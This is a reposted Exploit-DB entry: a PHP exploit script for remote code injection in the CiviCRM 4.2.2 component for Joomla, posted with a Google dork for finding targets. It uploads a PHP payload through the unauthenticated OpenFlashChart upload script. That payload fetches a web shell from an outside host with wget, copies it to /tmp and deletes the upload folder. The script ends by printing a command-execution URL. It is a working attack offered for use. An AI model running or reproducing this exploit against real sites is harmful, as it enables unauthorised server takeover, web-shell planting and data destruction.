Joomla! Component com_civicrm 4.2.2 – Remote Code Injection - 体验盒子

作者： iskorpitx

日期： 2013-04-22

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/24969/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

# Exploit Title: joomla component com_civicrm remode code injection exploit

# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"

# Date: 20/04/2013

# Exploit Author: iskorpitx

# Vendor Homepage: http://civicrm.org

# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422

# Version: [civicrm 4.2.2]

# Tested on: Win8 Pro x64

# CVE : http://www.securityweb.org

<?php

# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit

# http://www.securityweb.org & http://www.security.biz.tr

# multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php

$options = getopt('u:f:');

if(!isset($options['u'], $options['f']))

die("\nUsage example: php jnews.php -u http://target.com/ -f post.php\n

-u http://target.com/The full path to Joomla!

-f post.php The name of the file to create.\n");

$url =$options['u'];

$file=$options['f'];

$shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";

$url = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";

$data= '<?php

system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");

system("cp post.php ../../../../../../../tmp/post.php");

system("cd ..; rm -rf tmp-upload-images");

echo "by iskorpitx" ;

fclose ( $handle );

?>';

$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',

'Content-Type: text/plain');

echo "[+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);

curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);

curl_setopt($handle, CURLOPT_POSTFIELDS, $data);

curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);

curl_close($handle);

if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))

{

echo "[+] Exploit completed successfully!\n";

echo "______________________________________________\n\n{$shell}?cmd=system('id');\n";

}

else

{

die("[+] Exploit was unsuccessful.\n");

}

?>